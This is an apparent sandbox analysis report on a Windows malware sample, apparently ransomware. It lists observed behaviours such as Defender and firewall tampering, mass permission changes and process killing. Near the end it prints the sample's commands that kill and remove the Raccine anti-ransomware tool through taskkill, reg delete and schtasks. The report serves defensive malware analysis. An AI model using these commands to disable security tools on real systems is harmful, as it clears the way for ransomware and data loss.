1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
151s
max time network
60s
platform
windows7_x64
resource
win7v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Size

370KB
MD5

b8421f1d4bd96ca5b1e9a6e919e6a167
SHA1

e1040ad363c3a5bb7587faebaab0aecdc70a21df
SHA256

0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f
SHA512

e2ee73d80631d51d4d5267f34e6c7873c79fe1968d73daea141d782fc693fb6f436be18c9a3756fca3e68a44e2e75c9376e194f3ab11f95942e93b3a28117b63

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
5336	icacls.exe
2760
5696	icacls.exe
3760	icacls.exe
5436	icacls.exe
744	icacls.exe
6220	icacls.exe
2464	icacls.exe
6272	icacls.exe
3988	icacls.exe
3428	icacls.exe
4244	icacls.exe
5728
5924	icacls.exe
4056	icacls.exe
6388	icacls.exe
4128	icacls.exe
4028	icacls.exe
4880	icacls.exe
4296	icacls.exe
6176	icacls.exe
6824	icacls.exe
5032	icacls.exe
5016	icacls.exe
5684	icacls.exe
2176
4140	icacls.exe
4340	icacls.exe
6036	icacls.exe
948
1404	icacls.exe
4468	icacls.exe
5556	icacls.exe
6916	icacls.exe
6068	icacls.exe
4596	icacls.exe
3984	icacls.exe
5732	icacls.exe
4920	icacls.exe
3644	icacls.exe
6572
4572
4084	icacls.exe
2236	icacls.exe
1704	icacls.exe
3912	icacls.exe
2528
3120	icacls.exe
4448	icacls.exe
3708	icacls.exe
4760	icacls.exe
2968	icacls.exe
916	icacls.exe
5412	icacls.exe
2508	icacls.exe
1468
6416
2412	icacls.exe
2376
5776
2108	icacls.exe
5740	icacls.exe
5092	icacls.exe
6784	icacls.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!!!"	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Нужна помощь в IT безопасности?\r\n\r\nНаши специалисты Вам помогут.\r\n\r\nДля этого напишите нам на почту - [email protected]\r\n\r\nХорошего и продуктивного дня."	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

6548 net.exe

pid	process
6548	net.exe

Kills process with taskkill 57 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4484	taskkill.exe
4376	taskkill.exe
4328	taskkill.exe
4264	taskkill.exe
4240	taskkill.exe
4208	taskkill.exe
4384	taskkill.exe
4400	taskkill.exe
4352	taskkill.exe
4336	taskkill.exe
4128	taskkill.exe
4492	taskkill.exe
4288	taskkill.exe
4416	taskkill.exe
4368	taskkill.exe
4280	taskkill.exe
4272	taskkill.exe
4112	taskkill.exe
4408	taskkill.exe
4500	taskkill.exe
4392	taskkill.exe
4136	taskkill.exe
4120	taskkill.exe
4428	taskkill.exe
4476	taskkill.exe
4344	taskkill.exe
4216	taskkill.exe
4152	taskkill.exe
4516	taskkill.exe
4312	taskkill.exe
1036	taskkill.exe
4176	taskkill.exe
4168	taskkill.exe
4436	taskkill.exe
4556	taskkill.exe
4508	taskkill.exe
4144	taskkill.exe
4104	taskkill.exe
4540	taskkill.exe
4524	taskkill.exe
4232	taskkill.exe
4184	taskkill.exe
4160	taskkill.exe
4548	taskkill.exe
4360	taskkill.exe
4564	taskkill.exe
4532	taskkill.exe
4256	taskkill.exe
4192	taskkill.exe
4304	taskkill.exe
4200	taskkill.exe
2684	taskkill.exe
4452	taskkill.exe
4444	taskkill.exe
4296	taskkill.exe
4224	taskkill.exe
4320	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1080 reg.exe
Runs net.exe

pid	process
1080	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe

pid	process
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 61 IoCs

Processes:

0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exepowershell.exetaskkill.exenet1.exetaskkill.exetaskkill.exenet1.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Token: SeDebugPrivilege	852	powershell.exe
Token: SeDebugPrivilege	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Token: SeDebugPrivilege	1036	taskkill.exe
Token: SeDebugPrivilege	2684	net1.exe
Token: SeDebugPrivilege	4112	taskkill.exe
Token: SeDebugPrivilege	4128	taskkill.exe
Token: SeDebugPrivilege	4548	net1.exe
Token: SeDebugPrivilege	4516	taskkill.exe
Token: SeDebugPrivilege	4484	taskkill.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	4216	taskkill.exe
Token: SeDebugPrivilege	4392	taskkill.exe
Token: SeDebugPrivilege	4360	taskkill.exe
Token: SeDebugPrivilege	4408	taskkill.exe
Token: SeDebugPrivilege	4384	taskkill.exe
Token: SeDebugPrivilege	4344	taskkill.exe
Token: SeDebugPrivilege	4540	taskkill.exe
Token: SeDebugPrivilege	4508	taskkill.exe
Token: SeDebugPrivilege	4476	taskkill.exe
Token: SeDebugPrivilege	4352	taskkill.exe
Token: SeDebugPrivilege	4320	taskkill.exe
Token: SeDebugPrivilege	4288	taskkill.exe
Token: SeDebugPrivilege	4184	taskkill.exe
Token: SeDebugPrivilege	4232	taskkill.exe
Token: SeDebugPrivilege	4532	taskkill.exe
Token: SeDebugPrivilege	4500	taskkill.exe
Token: SeDebugPrivilege	4152	taskkill.exe
Token: SeDebugPrivilege	4452	taskkill.exe
Token: SeDebugPrivilege	4272	taskkill.exe
Token: SeDebugPrivilege	4556	taskkill.exe
Token: SeDebugPrivilege	4524	taskkill.exe
Token: SeDebugPrivilege	4256	taskkill.exe
Token: SeDebugPrivilege	4400	taskkill.exe
Token: SeDebugPrivilege	4104	taskkill.exe
Token: SeDebugPrivilege	4336	taskkill.exe
Token: SeDebugPrivilege	4368	taskkill.exe
Token: SeDebugPrivilege	4136	taskkill.exe
Token: SeDebugPrivilege	4304	taskkill.exe
Token: SeDebugPrivilege	4200	taskkill.exe
Token: SeDebugPrivilege	4416	taskkill.exe
Token: SeDebugPrivilege	4168	taskkill.exe
Token: SeDebugPrivilege	4492	taskkill.exe
Token: SeDebugPrivilege	4376	taskkill.exe
Token: SeDebugPrivilege	4120	taskkill.exe
Token: SeDebugPrivilege	4176	taskkill.exe
Token: SeDebugPrivilege	4444	taskkill.exe
Token: SeDebugPrivilege	4428	taskkill.exe
Token: SeDebugPrivilege	4192	taskkill.exe
Token: SeDebugPrivilege	4312	taskkill.exe
Token: SeDebugPrivilege	4328	taskkill.exe
Token: SeDebugPrivilege	4224	taskkill.exe
Token: SeDebugPrivilege	4264	taskkill.exe
Token: SeDebugPrivilege	4208	taskkill.exe
Token: SeDebugPrivilege	4144	taskkill.exe
Token: SeDebugPrivilege	4240	taskkill.exe
Token: SeDebugPrivilege	4160	taskkill.exe
Token: SeDebugPrivilege	4564	taskkill.exe
Token: SeDebugPrivilege	4296	taskkill.exe
Token: SeDebugPrivilege	4280	taskkill.exe
Token: SeDebugPrivilege	6476	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.execonhost.exe

description	pid	process	target process
PID 1240 wrote to memory of 852	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	powershell.exe
PID 1240 wrote to memory of 852	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	powershell.exe
PID 1240 wrote to memory of 852	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	powershell.exe
PID 1240 wrote to memory of 1036	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	taskkill.exe
PID 1240 wrote to memory of 1036	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	taskkill.exe
PID 1240 wrote to memory of 1036	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	taskkill.exe
PID 1240 wrote to memory of 1032	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	reg.exe
PID 1240 wrote to memory of 1032	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	reg.exe
PID 1240 wrote to memory of 1032	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	reg.exe
PID 1240 wrote to memory of 1080	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	reg.exe
PID 1240 wrote to memory of 1080	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	reg.exe
PID 1240 wrote to memory of 1080	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	reg.exe
PID 1240 wrote to memory of 1848	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	schtasks.exe
PID 1240 wrote to memory of 1848	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	schtasks.exe
PID 1240 wrote to memory of 1848	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	schtasks.exe
PID 1240 wrote to memory of 1512	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 1512	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 1512	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 1836	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 1836	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 1836	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 1052	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	cmd.exe
PID 1240 wrote to memory of 1052	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	cmd.exe
PID 1240 wrote to memory of 1052	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	cmd.exe
PID 1240 wrote to memory of 2020	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 2020	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 2020	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 1404	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 1404	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 1404	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 516	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 516	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 516	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 1724	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 1724	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 1724	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 1148	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 1148	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 1148	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 864	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 864	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 864	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	sc.exe
PID 1240 wrote to memory of 608	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	netsh.exe
PID 1240 wrote to memory of 608	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	netsh.exe
PID 1240 wrote to memory of 608	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	netsh.exe
PID 1240 wrote to memory of 2016	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 2016	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 2016	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 1668	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	conhost.exe
PID 1240 wrote to memory of 1668	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	conhost.exe
PID 1240 wrote to memory of 1668	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	conhost.exe
PID 1240 wrote to memory of 1692	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	netsh.exe
PID 1240 wrote to memory of 1692	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	netsh.exe
PID 1240 wrote to memory of 1692	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	netsh.exe
PID 1240 wrote to memory of 1820	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 1820	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1240 wrote to memory of 1820	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe
PID 1668 wrote to memory of 1816	1668	conhost.exe	net1.exe
PID 1668 wrote to memory of 1816	1668	conhost.exe	net1.exe
PID 1668 wrote to memory of 1816	1668	conhost.exe	net1.exe
PID 1240 wrote to memory of 1548	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net1.exe
PID 1240 wrote to memory of 1548	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net1.exe
PID 1240 wrote to memory of 1548	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net1.exe
PID 1240 wrote to memory of 2032	1240	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	net.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Нужна помощь в IT безопасности?\r\n\r\nНаши специалисты Вам помогут.\r\n\r\nДля этого напишите нам на почту - [email protected]\r\n\r\nХорошего и продуктивного дня."	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!!!"	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe"
1⤵
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:852
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1036
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1080
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1848
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
